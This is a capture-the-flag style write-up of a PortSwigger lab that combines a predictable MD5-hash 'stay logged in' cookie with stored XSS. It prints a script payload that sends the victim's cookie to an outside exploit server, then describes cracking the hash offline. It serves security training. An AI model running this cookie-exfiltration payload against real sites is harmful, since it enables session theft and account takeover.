[The lab](https://portswigger.net/web-security/authentication/other-mechanisms/lab-offline-password-cracking) simulates a classic _auth bypass + credential theft_ combo using two common misconfigurations: 1. **Insecure "Stay Logged In" Mechanism** – storing a predictable `username:md5(password)` string in a Base64-encoded cookie. 2. **Stored Cross-Site Scripting (XSS)** – a vulnerable comment system enables cookie exfiltration via JavaScript injection. After logging in as `wiener:peter`, intercept the **login response** in Burp Suite (Proxy > HTTP history). You’ll spot a `stay-logged-in` cookie like: ![[CleanShot 2025-03-24 at 23.53.59.png]] This tells us that the server validates the cookie by **recomputing the MD5 hash of the user's password** and comparing it. We can quickly find a XSS injection point in comment section with basic payload. ![[CleanShot 2025-03-24 at 23.56.33.png]] Let's insert the payload: ```js <script>document.location='https://exploit-0a1f004504c1950e836f9fb201e500dc.exploit-server.net/'+document.cookie</script> ``` ![[CleanShot 2025-03-25 at 00.00.06.png]] In the logs quickly we can see that the victim visits our site: ![[CleanShot 2025-03-25 at 00.01.46.png]] Firstly decode BASE64. You can use decoder. ![[CleanShot 2025-03-25 at 00.05.13.png]] Then, use [crackstation.net](https://crackstation.net/) for example. ==⚠️ **Security Tip:** Never upload real hashes to third-party sites. We do this here because it's a lab.== ![[CleanShot 2025-03-25 at 00.04.32.png]] We those info we can delete Carlos password: ![[CleanShot 2025-03-25 at 00.07.25.png]] ### Key Takeaways for Pentesters - **Hash-in-cookie ≠ secure** – using `md5(password)` inside persistent cookies is a broken pattern. Always use **HMACs or signed tokens**, not raw hashes. - **Stored XSS = Goldmine** – stored XSS enables full session hijacking, especially when cookies aren’t marked `HttpOnly`. - **Offline cracking = low noise** – no brute-force traffic hits the app, making it stealthy and effective if hash leaks. - **Always check cookies** – custom session mechanisms often reveal application logic flaws.